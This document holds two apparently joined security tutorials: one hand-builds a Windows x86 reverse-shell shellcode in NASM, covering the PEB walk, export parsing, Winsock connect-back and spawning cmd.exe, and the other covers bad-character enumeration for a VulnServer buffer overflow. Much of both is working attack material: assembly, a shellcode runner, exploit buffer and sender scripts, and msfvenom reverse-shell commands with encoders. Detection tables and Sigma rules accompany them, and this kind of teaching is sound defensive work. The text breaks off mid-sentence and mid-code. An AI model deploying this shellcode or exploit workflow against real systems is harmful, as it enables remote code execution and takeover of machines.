- The PEB is reached via gs:[0x60] on x64 (the TEB's ProcessEnvironmentBlock field); every subsequent offset (+0x18 for Ldr, +0x20 for InMemoryOrderModuleList, +0x20 from InMemoryOrderLinks to DllBase) differs from the x86 layout and must be verified against the target build.
- Position-independent API resolution combines a PEB walk to kernel32.dll with an EAT walk using ROR-13 name hashing to avoid embedded strings.
- Null-byte avoidance leans on 32-bit sub-register writes that zero-extend, RIP-relative lea, and XOR-then-push idioms.
- Detection is layered: Sysmon EventID 8/10 for injection chains, ETW Threat-Intelligence for syscall-level memory writes, behavioural hunts for unbacked RX regions, and ACG/CFG/ASR hardening to deny the primitives shellcode depends on.
Writing Your First Shellcode: x86 Reverse Shell from Scratch
Objective: Understand how a Windows x86 reverse shell payload is hand-built in NASM assembly (walking the PEB to locate kernel32.dll, parsing the PE export table to resolve GetProcAddress without imports, initialising Winsock, and spawning cmd.exe over a socket) and learn the telemetry each stage emits so you can detect and defend against it.
1. What Is Shellcode? Constraints and Goals
Shellcode is a self-contained blob of machine code that runs after a control-flow hijack (or injection) with no loader, no imports, and no fixed base address. It is the raw payload that tools like msfvenom emit; understanding it byte-by-byte is what lets a defender recognise it in memory.
A Windows x86 reverse shell differs from a Linux equivalent in one fundamental way: Linux exposes a stable syscall/int 0x80 interface, while Windows forces you to call documented Win32 APIs — and you cannot import them, because injected code has no import table. You must therefore find the APIs yourself at runtime.
| Constraint | Description |
|---|---|
| Position independent | Runs at an unknown address; all references are stack-relative or computed |
| Null-free | \x00 terminates strings in many injection vectors and truncates the payload |
| No imports | API addresses must be resolved from loaded modules at runtime |
| Bad-char aware | \x00, \x0a, \x0d and vector-specific bytes must be avoided by design |
Lab setup: a Windows 10 x86 VM, NASM for assembly, WinDbg for stepping the PEB walk, a small C runner to execute the blob, and a Python scanner to audit bad characters. Build and test only in an isolated VM.
2. x86 Calling Conventions and Stack Mechanics
Win32 APIs use stdcall: arguments are pushed right-to-left, and the callee cleans the stack with ret N. This matters because after a successful API call you do not adjust esp yourself — the function already did. cdecl (caller cleans) appears only in CRT helpers you will not touch here.
| Convention | Stack Cleanup | Argument Order | Used By |
|---|---|---|---|
| stdcall | Callee (ret N) | Right-to-left | Win32 APIs (CreateProcessA, WSASocketA) |
| cdecl | Caller | Right-to-left | CRT functions |
eax, ecx, and edx are volatile (caller-saved); ebx, esi, edi, and ebp survive a call. Shellcode exploits this: stash the kernel32 base in ebx and a resolver pointer in ebp, and they persist across every API call. Strings and structures are constructed by pushing dwords onto the stack in reverse, then referencing them directly through esp.
3. The PEB Walk: Finding kernel32.dll Without Imports
Every thread can reach its Process Environment Block (PEB) through the TEB field at FS:[0x30]. The PEB holds Ldr (a PEB_LDR_DATA) at +0x0C, whose InMemoryOrderModuleList at +0x14 is a doubly-linked list of loaded modules. In 32-bit processes on Windows 7 and later the load order is stable in practice: [0] the executable → [1] ntdll.dll → [2] kernel32.dll. Two FLink dereferences from the first entry land on kernel32's entry, and DllBase sits 0x10 bytes past the InMemoryOrderLinks field.
bits 32
xor eax, eax
mov eax, [fs:0x30] ; TEB->ProcessEnvironmentBlock (PEB)
mov eax, [eax+0x0c] ; PEB->Ldr (PEB_LDR_DATA)
mov eax, [eax+0x14] ; Ldr->InMemoryOrderModuleList (1st: executable)
mov eax, [eax] ; FLink -> ntdll.dll entry
mov eax, [eax] ; FLink -> kernel32.dll entry
mov ebx, [eax+0x10] ; LDR entry->DllBase (kernel32 base) -> ebx
Verify the chain live in WinDbg before trusting any offset on your target build:
0:000> dt nt!_TEB @$teb ProcessEnvironmentBlock
0:000> dt nt!_PEB @$peb Ldr
0:000> dt nt!_PEB_LDR_DATA poi(@$peb+0xc) InMemoryOrderModuleList
0:000> dl poi(poi(@$peb+0xc)+0x14) 4
![Flowchart showing the PEB walk chain from TEB at FS:[0x30] through PEB, PEB_LDR_DATA, and InMemoryOrderModuleList to reach kernel32.dll base address](https://genxcyber.com/wp-content/uploads/2026/06/x86-reverse-shell-shellcode-from-scratch-bf1-scaled.png)
4. Export Table Parsing: Resolving GetProcAddress
The bootstrap problem: shellcode cannot call GetProcAddress until it has found GetProcAddress. The fix is to parse the kernel32 PE export table manually. From the base, e_lfanew at +0x3C reaches the NT headers; the export-directory RVA lives at NT +0x78; the directory exposes three parallel arrays — AddressOfNames (+0x20), AddressOfNameOrdinals (+0x24), and AddressOfFunctions (+0x1C).
; ebx = kernel32 base
mov eax, [ebx+0x3c] ; e_lfanew
mov eax, [ebx+eax+0x78] ; export table RVA
lea edi, [ebx+eax] ; edi -> IMAGE_EXPORT_DIRECTORY
mov ecx, [edi+0x20] ; AddressOfNames RVA
lea ecx, [ebx+ecx] ; -> name-pointer array
xor edx, edx ; name index = 0
.next:
mov esi, [ecx+edx*4] ; RVA of candidate name
lea esi, [ebx+esi] ; -> ASCII name string
; compare esi against "GetProcAddress" (string or 4-byte hash) ...
inc edx
jmp .next
.match:
mov eax, [edi+0x24] ; AddressOfNameOrdinals RVA
movzx eax, word [ebx+eax+edx*2] ; ordinal index for this name
mov ecx, [edi+0x1c] ; AddressOfFunctions RVA
mov eax, [ebx+ecx+eax*4]; function RVA
lea eax, [ebx+eax] ; eax = VA of GetProcAddress
Production shellcode usually replaces the literal strcmp with a rolling 4-byte hash of each export name: it is smaller and naturally null-free.

5. Bootstrapping Further API Resolution
Once GetProcAddress is resolved, save it (e.g. in ebp) and use it to resolve everything else. The first follow-up is LoadLibraryA, which lets you bring in ws2_32.dll and resolve the Winsock functions the reverse shell needs.
; ebp = resolved GetProcAddress, ebx = kernel32 base
xor eax, eax
push eax ; null terminator for the string built below
push 0x41797261 ; "aryA"
push 0x7262694c ; "Libr"
push 0x64616f4c ; "Load"
mov esi, esp ; esi -> "LoadLibraryA"
push esi
push ebx ; hModule = kernel32
call ebp ; GetProcAddress -> LoadLibraryA in eax
; eax now holds LoadLibraryA; call it on "ws2_32.dll", then resolve
; WSAStartup, WSASocketA, WSAConnect, CreateProcessA, ExitProcess.
Every API name is pushed as reversed dwords so it reads correctly in memory, with a zero dword pushed first to terminate it. Wrap the resolve-and-call logic in a small subroutine that takes a module base and a name pointer; the reverse shell calls it seven times.
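From the analyst's side, the same property makes stack strings easy to recover: collect the immediates of consecutive push instructions and reverse them. The sketch below is illustrative only; recover_stack_string is a hypothetical helper name, and it assumes every push is a full 32-bit immediate.

```python
import struct
from typing import Iterable


def recover_stack_string(pushed_dwords: Iterable[int]) -> bytes:
    """Rebuild the string formed by a run of `push imm32` instructions.

    `pushed_dwords` is given in the order the pushes appear in the
    disassembly. The last value pushed sits at the lowest address, so the
    chunks are reversed before joining; anything after a null is dropped.
    """
    chunks = [struct.pack("<I", dword) for dword in pushed_dwords]
    return b"".join(reversed(chunks)).split(b"\x00", 1)[0]


if __name__ == "__main__":
    print(recover_stack_string([0x41797261, 0x7262694C, 0x64616F4C]))
```

Running this over push sequences in a disassembly listing is a quick way to surface API and module names that a strings scan of the raw blob would miss.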
6. Winsock Initialisation and Socket Creation
WSAStartup(0x0202, &wsaData) must run before any socket API. Reserve the 400-byte WSADATA on the stack and pass a pointer; the OS fills it. Then WSASocketA(2, 1, 6, NULL, 0, 0) creates a TCP socket (AF_INET, SOCK_STREAM, IPPROTO_TCP).
sub esp, 0x190 ; reserve WSADATA (400 bytes)
push esp ; lpWSAData
push 0x0202 ; wVersionRequired = 2.2
call <WSAStartup>
xor eax, eax
push eax ; dwFlags
push eax ; g
push eax ; lpProtocolInfo = NULL
push 6 ; IPPROTO_TCP
push 1 ; SOCK_STREAM
push 2 ; AF_INET
call <WSASocketA> ; eax = socket handle
mov edi, eax ; save socket in edi
Build the 16-byte SOCKADDR_IN inline and connect. The IP and port are stored in network byte order (big-endian); 127.0.0.1:4444 becomes 0x0100007f, and the packed family/port dword becomes 0x5c110002.
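The two constants can be derived, or decoded when they turn up in a sample, with Python's struct and socket modules. This is a small sketch; sockaddr_in_dwords is a hypothetical helper name and AF_INET is hard-coded to its Winsock value of 2.

```python
import socket
import struct
from typing import Tuple

AF_INET = 2  # Winsock address family for IPv4


def sockaddr_in_dwords(ip: str, port: int) -> Tuple[int, int]:
    """Return (family/port dword, address dword) as they appear in push imm32."""
    # sin_family is a little-endian 16-bit value; sin_port is big-endian.
    family_port = struct.pack("<H", AF_INET) + struct.pack(">H", port)
    # inet_aton yields the four address bytes in network order.
    addr = socket.inet_aton(ip)
    # The CPU reads each 4-byte group as a little-endian dword.
    return struct.unpack("<I", family_port)[0], struct.unpack("<I", addr)[0]


if __name__ == "__main__":
    fam_port, addr = sockaddr_in_dwords("127.0.0.1", 4444)
    print(f"0x{fam_port:08x} 0x{addr:08x}")
```

The assembly that follows pushes these same two dwords, address first and family/port second, so the structure reads correctly from esp upward.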
xor eax, eax
push eax ; sin_zero[4..8]
push eax ; sin_zero[0..4]
push 0x0100007f ; sin_addr = 127.0.0.1
push 0x5c110002 ; sin_port 4444 | sin_family AF_INET
mov esi, esp ; esi -> SOCKADDR_IN
push eax ; lpCallee/QoS chain (NULLs)
push eax
push eax
push eax
push 0x10 ; namelen
push esi ; name -> SOCKADDR_IN
push edi ; socket
call <WSAConnect>
7. Spawning cmd.exe Over the Socket
The final stage is the most error-prone: a fully populated 68-byte STARTUPINFOA with cb = 0x44, dwFlags = STARTF_USESTDHANDLES (0x100), and all three standard handles pointed at the connected socket. CreateProcessA(NULL, " cmd.exe", ...) then launches the shell with stdin/stdout/stderr riding the TCP stream.
xor eax, eax
push edi ; hStdError = socket
push edi ; hStdOutput = socket
push edi ; hStdInput = socket
times 9 push eax ; zero lpReserved2..dwY (9 dwords)
push 0x00000100 ; dwFlags = STARTF_USESTDHANDLES
times 4 push eax ; lpTitle, lpDesktop, lpReserved, wShowWindow pad
push 0x44 ; cb = sizeof(STARTUPINFOA)
mov ebx, esp ; ebx -> STARTUPINFOA
sub esp, 0x10
mov esi, esp ; esi -> PROCESS_INFORMATION
push eax ; "....\0" terminator (runtime-supplied null)
push 0x6578652e ; ".exe"
push 0x646d6320 ; " cmd" (0x20 = space, null-free)
mov edx, esp ; edx -> " cmd.exe"
push esi ; lpProcessInformation
push ebx ; lpStartupInfo
push eax ; lpCurrentDirectory
push eax ; lpEnvironment
push eax ; dwCreationFlags
inc eax
push eax ; bInheritHandles = TRUE
dec eax
push eax ; lpThreadAttributes
push eax ; lpProcessAttributes
push edx ; lpCommandLine = " cmd.exe"
push eax ; lpApplicationName = NULL
call <CreateProcessA>
push eax ; uExitCode
call <ExitProcess>
8. Null-Byte Elimination and Bad-Character Audit
A single \x00 mid-payload can truncate your shellcode. Design it out from the start.
| Bad Byte | Naive Source | Null-Free Replacement |
|---|---|---|
| \x00 | mov ecx, 0 | xor ecx, ecx |
| \x00 in string | push 0x00657865 ("exe\0") | terminator from push eax after xor eax,eax |
| \x00 in mov al,0 | mov al, 0 | xor eax, eax then use al |
| \x0a / \x0d | constant containing CR/LF | re-encode IP/port or split the immediate |
The runtime-supplied terminator trick (xor eax, eax → push eax) keeps the " cmd.exe" string null-free, and CreateProcessA's command-line parser tolerates the leading space that the padded " cmd" dword introduces. Audit the assembled binary with a scanner:
import sys
BAD = {0x00, 0x0a, 0x0d} # extend per injection vector
with open(sys.argv[1], "rb") as f:
    sc = f.read()
for i, b in enumerate(sc):
    if b in BAD:
        print(f"[!] bad char 0x{b:02x} at offset {i}")
print(f"[*] {len(sc)} bytes scanned")
9. Testing and Verification
Assemble to a flat binary, then execute it in a controlled runner that mirrors how an exploit lands code in memory — VirtualAlloc with PAGE_EXECUTE_READWRITE, copy, and call through a function pointer.
nasm -f bin reverse.asm -o reverse.bin
python3 badchars.py reverse.bin
#include <windows.h>
#include <string.h>
unsigned char sc[] = { /* contents of reverse.bin */ };
int main(void) {
    void *mem = VirtualAlloc(NULL, sizeof(sc),
                             MEM_COMMIT | MEM_RESERVE,
                             PAGE_EXECUTE_READWRITE); // RWX: loud, lab-only
    memcpy(mem, sc, sizeof(sc));
    ((void(*)())mem)();
    return 0;
}
Catch the callback with nc -lvnp 4444. Note the RWX allocation: real-world loaders allocate RW, copy, then flip to RX with VirtualProtect precisely because PAGE_EXECUTE_READWRITE is a classic detection signal.
10. Common Attacker Techniques
| Technique | Description |
|---|---|
| PEB walk | Locate kernel32.dll base with no imports via FS:[0x30] |
| Export hashing | Resolve APIs by name hash to stay small and null-free |
| Stack string building | Push reversed dwords to stage " cmd.exe", ws2_32.dll, API names |
| STDIO redirection | Point hStdInput/Output/Error at the socket for an interactive shell |
| Process injection | Deliver the blob via VirtualAllocEx + WriteProcessMemory + CreateRemoteThread |
| RW → RX staging | Allocate RW, copy, VirtualProtect to RX to evade RWX heuristics |
11. Defensive Strategies and Detection
Each shellcode stage emits telemetry. Map detections to the chain, not to a single indicator.
| Sysmon Event ID | Name | What It Catches |
|---|---|---|
| 1 | Process Create | cmd.exe with an unexpected ParentImage / ParentCommandLine |
| 3 | Network Connection | Outbound TCP from cmd.exe or a non-browser binary (C2 connect-back) |
| 8 | CreateRemoteThread | Cross-process thread where SourceImage ≠ TargetImage |
| 10 | ProcessAccess | GrantedAccess to injected memory; CallTrace containing UNKNOWN |
| 11 | FileCreate | Shellcode or loader dropped to disk |
Windows Security auditing adds Event 4688 (process creation with command line, when ProcessCreationIncludeCmdLine_Enabled = 1), 5156 (WFP outbound TCP allowed — the reverse connect at the network layer), and 4689 (process exit, for shell-lifetime correlation). The kernel Microsoft-Windows-Threat-Intelligence ETW provider emits KERNEL_THREATINT_TASK_ALLOCVM/PROTECTVM on RWX activity but requires a signed ELAM/PPL consumer.
The canonical community Sigma rule for shellcode injection keys on ProcessAccess:
title: Shellcode Process Injection via Suspicious ProcessAccess
logsource:
  category: process_access
  product: windows
detection:
  selection:
    GrantedAccess:
      - '0x147a'
      - '0x1f3fff'
    CallTrace|contains: 'UNKNOWN'
  condition: selection
tags:
  - attack.defense_evasion
  - attack.privilege_escalation
  - attack.t1055
level: high
Hardening: enable command-line auditing, deploy a tuned Sysmon baseline (SwiftOnSecurity / Olaf Hartong) for EIDs 1/3/8/10, enforce default-deny egress on workstations (reverse shells need outbound TCP), apply ASR rules such as D4F940AB-401B-4EFC-AADC-AD5F3C50688A (block Office child processes) and d3e037e1-3eb8-44c8-a917-57927947596d (block JavaScript or VBScript from launching downloaded executable content), and alert on VirtualAlloc(RWX). AMSI does not see raw shellcode but catches PowerShell/VBScript loaders.

12. Tools for Shellcode Analysis
| Tool | Description | Link |
|---|---|---|
| NASM | Assemble x86 to flat binary | nasm.us |
| WinDbg | Step the PEB walk and export parse live | microsoft.com |
| x64dbg | Dynamic analysis of the loader and payload | x64dbg.com |
| Ghidra | Static disassembly of extracted shellcode | ghidra-sre.org |
| Radare2 | Lightweight disassembly and patching | radare.org |
| Sysmon | Generate EID 1/3/8/10 detection telemetry | microsoft.com |
| Volatility | Memory forensics — recover RWX regions and injected code | volatilityfoundation.org |
13. MITRE ATT&CK Mapping
| Technique | MITRE ID | Detection |
|---|---|---|
| Command and Scripting Interpreter: Windows Command Shell | T1059.003 | Sysmon EID 1 / 4688 cmd.exe spawn chain |
| Process Injection | T1055 | Sysmon EID 10 GrantedAccess + CallTrace UNKNOWN |
| Process Injection: DLL Injection | T1055.001 | Sysmon EID 7/8 on reflective-DLL delivery |
| Obfuscated Files or Information | T1027 | Null-free/encoded IP/port constants in the blob |
| Non-Application Layer Protocol | T1095 | Sysmon EID 3 / 5156 raw TCP from non-browser process |
| Application Layer Protocol: Web Protocols | T1071.001 | Proxy/TLS inspection (contrast C2 transport) |
| System Information Discovery | T1082 | PEB walk as in-memory module discovery |
| Native API | T1106 | Direct WSASocketA / CreateProcessA calls without framework APIs |
Summary
- A Windows x86 reverse shell is just position-independent code that resolves its own APIs, opens a TCP socket, and redirects cmd.exe over it.
- The PEB walk (FS:[0x30] → Ldr → InMemoryOrderModuleList, third entry) locates kernel32.dll with no imports.
- Parsing the PE export table resolves GetProcAddress, which bootstraps LoadLibraryA and every Winsock function.
- Null-byte and bad-character avoidance is a design constraint, not a post-step: xor for zero, reversed stack strings, runtime-supplied terminators.
- Det
Bad Characters, Null Bytes, and Restricted Character Sets
Objective: Understand why certain bytes corrupt, truncate, or transform shellcode in stack-based buffer overflows, how to systematically enumerate a target’s restricted character set, and how to adapt encoding or instruction substitution to survive those constraints — alongside how defenders detect the resulting exploitation patterns.
1. What Are Bad Characters? The Concept Explained
A bad character is any byte that causes the vulnerable application’s input-handling routine to misbehave: corrupt, truncate, or transform the payload before it reaches EIP. There is no universal set. The exact bad characters depend on the application’s parsing logic and the protocol in use.
Shellcode cannot contain bytes that the target interprets incorrectly — a newline, a delimiter, or a string terminator. The root cause is usually a string-handling function. C runtime (CRT) routines like strcpy, strncpy, strcat, sprintf, and the deprecated gets operate on null-terminated buffers and stop on specific sentinel bytes.
When you inspect memory after a crash, you are hunting for three distinct failure modes:
- Missing bytes: characters stripped entirely by a sanitiser.
- Altered bytes: characters transformed (e.g., \x80 appearing as \x01).
- Premature termination: a byte that halts the copy, so nothing after it is written.
Identifying which bytes trigger these behaviors is a mandatory phase before any reliable shellcode can be placed.

2. Why \x00 Is Always the First Enemy
The null byte (\x00) is always a bad character in string-based overflows. C-style string functions treat \x00 as the terminator, so any shellcode byte following a null is silently discarded.
| Function | Behavior on \x00 |
|---|---|
| strcpy | Stops copying at the first null |
| strncpy | Stops at null or n bytes |
| strlen | Returns length up to first null |
| sprintf | Terminates the formatted string |
| gets | Does not stop at null; reads until a newline (\x0A). Legacy, present in old targets |
At the assembly level, strlen walks the buffer comparing each byte to zero and breaks on a match — that loop defines the truncation boundary. This is not a convention; it is a property of how the Windows CRT and Win32 LPSTR / LPWSTR parameters handle null-terminated strings.
Network contexts differ. A socket recv call reads a fixed byte count and will pass null bytes through the wire into the buffer. So \x00 may survive transport but still die the moment the data hits a strcpy. Treat the string API and the socket as separate constraint layers.
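The two layers can be modelled in a few lines of Python. This is a toy simulation rather than real CRT behaviour in every detail: c_string_copy is a hypothetical stand-in for strcpy that keeps only the bytes before the first null.

```python
def c_string_copy(src: bytes) -> bytes:
    """Model strcpy: copy bytes up to, but not including, the first null."""
    end = src.find(b"\x00")
    return src if end == -1 else src[:end]


# Layer 1: the socket delivers every byte, nulls included.
received = b"\x41\x42\x00\x43\x44"

# Layer 2: the string copy silently drops everything after the null.
copied = c_string_copy(received)

if __name__ == "__main__":
    print(f"received {len(received)} bytes, copied {len(copied)} bytes: {copied!r}")
```

Comparing the length of what was sent with what arrives in the destination buffer is the same check a debugger session performs by hand.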
3. Common Bad Characters by Protocol and Context
Restrictions come from three sources: protocol-specific rules (HTTP terminating on \x0D\x0A), application sanitisation (stripping nulls or high bytes), and encoding layers (Base64 or Unicode transformations).
| Byte | Hex | Reason |
|---|---|---|
| Null | \x00 | String terminator — always bad in string overflows |
| Line Feed | \x0A | Newline — terminates input in many protocol parsers |
| Carriage Return | \x0D | CR — terminates input lines (HTTP, SMTP, POP3) |
| Space | \x20 | Whitespace delimiter — terminates tokens in some parsers |
| 0xFF byte | \xFF | Causes issues in some parsing contexts |
A web server vulnerable in its URI handler is the canonical restricted-set case: the legal URI character set is small, and non-printable or extended characters are rejected outright, narrowing or preventing exploitation. SMTP, POP3, and FTP argument parsers each impose their own delimiters.
4. Building and Sending the Test Byte Array
The standard methodology: generate every non-null byte (\x01–\xFF), place it after the EIP-overwrite offset, crash the target, and compare sent versus received in memory. Python builds the array cleanly:
# Generate \x01 through \xFF (255 bytes, null excluded)
badchar_test = bytearray(range(1, 256))
offset = 2003 # VulnServer TRUN EIP offset (illustrative)
buf = b"A" * offset
buf += b"B" * 4 # EIP overwrite marker
buf += bytes(badchar_test) # byte array lands at ESP
buf += b"C" * (3000 - len(buf)) # padding
You then deliver that buffer to the vulnerable service running under a debugger:
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.56.10", 9999))
s.recv(1024)
s.sendall(b"TRUN /.:/" + buf) # VulnServer TRUN command; sendall avoids a partial send
s.close()
After the crash, the \x01–\xFF block should appear contiguously in memory, typically at or near ESP.
5. Inspecting Memory: Immunity Debugger and mona.py
In Immunity Debugger, follow ESP in the hex dump and use the mona plugin to diff what you sent against what landed.
!mona config -set workingfolder c:\mona\%p
!mona bytearray -cpb "\x00"
!mona compare -f c:\mona\<process_name>\bytearray.bin -a <ESP_address>
- !mona config sets the output directory; %p expands to the debugged process name, so the files land in a per-process subfolder.
- !mona bytearray -cpb "\x00" writes a reference bytearray.bin (all \x01–\xFF) excluding the specified bad chars.
- !mona compare diffs the reference file against the live memory at the supplied ESP address and prints a per-byte verdict.
Annotated mona output looks like:
[+] Comparing with memory at address 0x00ab1a30
Only the first 18 bytes were identical
Possibly bad chars: 0a 0d
[+] Bytes omitted from input: ...
6. Iterative Elimination: Narrowing the Bad List
Mona flags where the sequence diverges. The critical nuance: only the first byte of a corrupted run is necessarily bad. Subsequent corruption is often a knock-on effect of that first offender shifting alignment.
If memory shows 11 12 13 15 with 14 missing, then \x14 is the only confirmed bad character at that step — not \x15 or anything after it. Add \x14 to your exclusion list, regenerate, and re-run:
BADCHARS = b"\x00\x0a\x0d" # grows one confirmed byte per pass
full = bytearray(range(1, 256))
test = bytes(b for b in full if b not in BADCHARS)
# rebuild buffer with `test`, resend, re-inspect under the debugger
Repeat the send → inspect → eliminate cycle until the entire \x01–\xFF block (minus the confirmed bad bytes) appears intact at ESP. Mirror the same exclusion list in !mona bytearray -cpb "..." so the reference file matches.
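The "first divergence only" rule can be sketched in a few lines of Python. This is a minimal illustration, not mona's comparison algorithm: `first_divergence` is a hypothetical helper name, and `observed` stands in for bytes copied out of the debugger's hex dump.

```python
def first_divergence(sent: bytes, observed: bytes):
    """Return (index, sent_byte) at the first mismatch, or None if intact."""
    for i, expected in enumerate(sent):
        if i >= len(observed) or observed[i] != expected:
            return i, expected
    return None


badchars = b"\x00"  # bad bytes confirmed so far
sent = bytes(b for b in range(1, 256) if b not in badchars)

# Hypothetical dump: the target silently dropped \x14, shifting every later byte.
observed = bytes(b for b in sent if b != 0x14)

hit = first_divergence(sent, observed)
if hit is not None:
    index, byte = hit
    print(f"first divergence at index {index}: \\x{byte:02x}")
```

Only the byte returned here goes onto the exclusion list; everything after it is re-tested on the next pass.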

7. Encoding Shellcode with msfvenom
Once the bad-char set is known, generate shellcode that avoids it. msfvenom's -b flag specifies the forbidden bytes; it then picks an encoder (x86/shikata_ga_nai by default) to re-encode around them.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 \
-b '\x00\x0a\x0d\x20' -e x86/shikata_ga_nai -f python
x86/shikata_ga_nai (ranked excellent) is a polymorphic XOR additive-feedback encoder. It reorders instructions and dynamically selects registers, producing different output each run and frustrating signature-based detection.
Size overhead is real. Encoding inflates the payload — a 71-byte stub can grow to 98 bytes after one shikata_ga_nai pass. Account for buffer space accordingly.
Failure case: when the bad-char list is too restrictive, shikata_ga_nai may abort with "A valid opcode permutation could not be found". Fall back to an alternative encoder:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 \
-b '\x00\x0a\x0d\x20\xff' -e x86/call4_dword_xor -f python
x86/call4_dword_xor and x86/countdown use different decoder stubs that may satisfy tighter constraints.

8. Alphanumeric and Printable-Only Constraints
When so many bytes are forbidden that standard encoders fail, switch to printable-ASCII-only output. x86/alpha_mixed (msfvenom) and the standalone Alpha2 tool emit shellcode confined to the \x21–\x7E printable range — ideal when the target only passes printable URI characters.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 \
-e x86/alpha_mixed BufferRegister=ESP -f python
The BufferRegister option tells the decoder which register points to the payload, removing the self-locating GetPC stub. The trade-off is size: an alphanumeric payload can balloon to 710 bytes or more. When the available buffer cannot hold an inflated payload, stage a small egghunter to search memory for a larger second-stage payload placed elsewhere.
9. Instruction Substitution: Jumping Without Bad Opcodes
Sometimes the bad character lives in your jump opcode, not your shellcode body. The short JMP maps to \xEB, and \xEB is frequently bad in HTTP and other network-protocol targets — so the instruction cannot be used as-is.
| Instruction | Opcode bytes | Notes |
|---|---|---|
| JMP SHORT +6 | \xEB \x06 | \xEB often restricted |
| JE / JNE pair | \x74 .. \x75 .. | Two complementary branches; exactly one is always taken |
| Near JMP | \xE9 .. .. .. .. | Alternative when \xEB is bad |
A bad-char-safe substitution uses a conditional pair that, regardless of the zero flag, always transfers control:
; JMP SHORT replacement using complementary conditionals
je short target ; 74 xx -> jump if ZF=1
jne short target ; 75 xx -> jump if ZF=0
; one branch is always taken; no \xEB byte present
target:
; decoder / shellcode continues here
In SEH overwrites, the 4-byte nSEH field typically holds a JMP SHORT that hops over the SE handler pointer into the payload, so its opcode bytes must also dodge the bad-char set. Use mona or WinDbg to locate suitable jump equivalents and clean POP POP RET gadgets.
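Checking a candidate jump stub against the bad-char set is a simple membership test. The sketch below assumes a hypothetical filter that strips \xEB; `bad_bytes_in` and the `candidates` table are illustrative names. The JE/JNE displacements (+6 and +4) are chosen so that both branches land on the same byte, eight bytes past the start of the stub.

```python
def bad_bytes_in(stub: bytes, badchars: bytes) -> list:
    """Return the forbidden bytes present in stub, in order of appearance."""
    return [b for b in stub if b in badchars]


badchars = b"\x00\x0a\x0d\xeb"  # hypothetical set in which \xEB is filtered

candidates = {
    "jmp short +6": b"\xeb\x06",
    "je +6 / jne +4": b"\x74\x06\x75\x04",  # both branches reach stub start + 8
}

for name, stub in candidates.items():
    hits = bad_bytes_in(stub, badchars)
    verdict = "clean" if not hits else "bad: " + " ".join(f"{b:02x}" for b in hits)
    print(f"{name:16s} {verdict}")
```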
10. Unicode / Wide-Character Transformations
A distinct constraint class: some applications convert input via MultiByteToWideChar() (Win32) or mbstowcs() (CRT), expanding each byte to a wide character and effectively inserting a null after every byte. This breaks shellcode alignment entirely — it is transformation, not stripping.
# You send: \x41\x42
# Memory shows: \x41\x00\x42\x00 <- every odd byte zeroed
sent = b"\x41\x42"
observed = b"\x41\x00\x42\x00" # Unicode expansion in the debugger
A naive \x01–\xFF array will look catastrophically corrupted under this transformation because every byte appears null-padded. The classical mitigation is Venetian shellcode, manually constructed so that the injected null bytes become harmless padding instructions, letting the real opcodes survive expansion. Identify these buffers by spotting the regular \x00 interleave in the hex dump.
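The interleave is easy to reproduce and to recognise programmatically. The following sketch models the expansion as a Latin-1 to UTF-16LE conversion, which is an assumption: the real MultiByteToWideChar() result depends on the active code page, and bytes at or above \x80 may map to other code points. `widen` and `looks_widened` are hypothetical helper names.

```python
def widen(data: bytes) -> bytes:
    """Model byte-to-wide-char expansion as Latin-1 -> UTF-16LE (an assumption)."""
    return data.decode("latin-1").encode("utf-16-le")


def looks_widened(dump: bytes) -> bool:
    """True when every second byte is null, the telltale Unicode interleave."""
    return len(dump) >= 2 and len(dump) % 2 == 0 and all(b == 0 for b in dump[1::2])


sent = b"\x41\x42\x43\x44"
observed = widen(sent)

print(observed.hex(" "))
print("wide-char buffer suspected:", looks_widened(observed))
```

Running `looks_widened` over the bytes at ESP before starting bad-char elimination avoids misreading a transformation as a long list of individually bad bytes.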
11. Common Attacker Techniques
| Technique | Description |
|---|---|
| Bad-char enumeration | Inject \x01–\xFF, diff memory, identify forbidden bytes |
| Shellcode encoding | Re-encode with shikata_ga_nai / call4_dword_xor to avoid bad bytes |
| Alphanumeric shellcode | alpha_mixed / Alpha2 for printable-only constraints |
| Jump substitution | Replace \xEB with JE/JNE pairs or near JMP |
| Venetian shellcode | Survive Unicode expansion in wide-character buffers |
| Egghunter staging | Small finder stub locating a larger payload in tight buffers |
These are pre-exploitation tradecraft — they enable shellcode delivery but execution and payload behavior are what generate detectable telemetry.
12. Defensive Strategies & Detection
Bad-char testing itself is quiet, but the encoded shellcode it produces is loud once it executes from unbacked memory.
| Event ID | Name | Relevance |
|---|---|---|
| 1 | Process Creation | Frameworks (Metasploit, Empire) launching payloads |
| 3 | Network Connection | Outbound C2 from an exploited process |
| 8 | CreateRemoteThread | Post-exploitation thread injection |
| 10 | ProcessAccess | Cross-process open by injected payload |
| 11 | FileCreate | Shellcode or payload dropped to disk |
Sysmon Event ID 10 (ProcessAccess) is the primary signal. Shellcode executing from anonymous stack or heap memory produces a CallTrace containing UNKNOWN frames — code with no backing image on disk.
title: Shellcode Injection via Suspicious Process Access
logsource:
    category: process_access
    product: windows
detection:
    selection:
        EventID: 10
        GrantedAccess:
            - '0x147a'
            - '0x1f3fff'
        CallTrace|contains: 'UNKNOWN'
    condition: selection
level: high
Additional telemetry and hardening:
- ETW: subscribe to Microsoft-Windows-Threat-Intelligence (ETWTI) to observe injection and memory manipulation; Microsoft-Windows-Security-Auditing for process audit events.
- Audit Process Creation (Detailed Tracking) → Security Event 4688 with command-line logging captures framework invocations.
- WAF / network: flag URI patterns carrying buffer-overflow payloads; a burst of access-violation or segfault alerts in a short window signals active exploitation attempts.
- Compiler mitigations: /GS, /SAFESEH, /DYNAMICBASE, /NXCOMPAT raise the exploitation bar.
- Input validation: allowlist legal characters at the boundary; explicitly reject \x00, \x0A, \x0D.
- WDEG: enforce DEP and CFG per-process via Set-ProcessMitigation.
- Memory integrity: flag executable pages not backed by a known on-disk image.
- Deploy Sysmon with a community baseline (SwiftOnSecurity, olafhartong sysmon-modular) to ensure EID 10 captures CallTrace.
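For triage outside a SIEM, the same logic as the Event ID 10 rule above can be applied to exported events. This is a rough sketch that assumes each event has already been parsed into a dict keyed by Sysmon field names; the sample events and image paths are invented for illustration.

```python
SUSPICIOUS_ACCESS = {"0x147a", "0x1f3fff"}  # masks taken from the rule above


def is_suspicious(event: dict) -> bool:
    """Flag ProcessAccess events whose call stack includes unbacked memory."""
    return (
        event.get("EventID") == 10
        and str(event.get("GrantedAccess", "")).lower() in SUSPICIOUS_ACCESS
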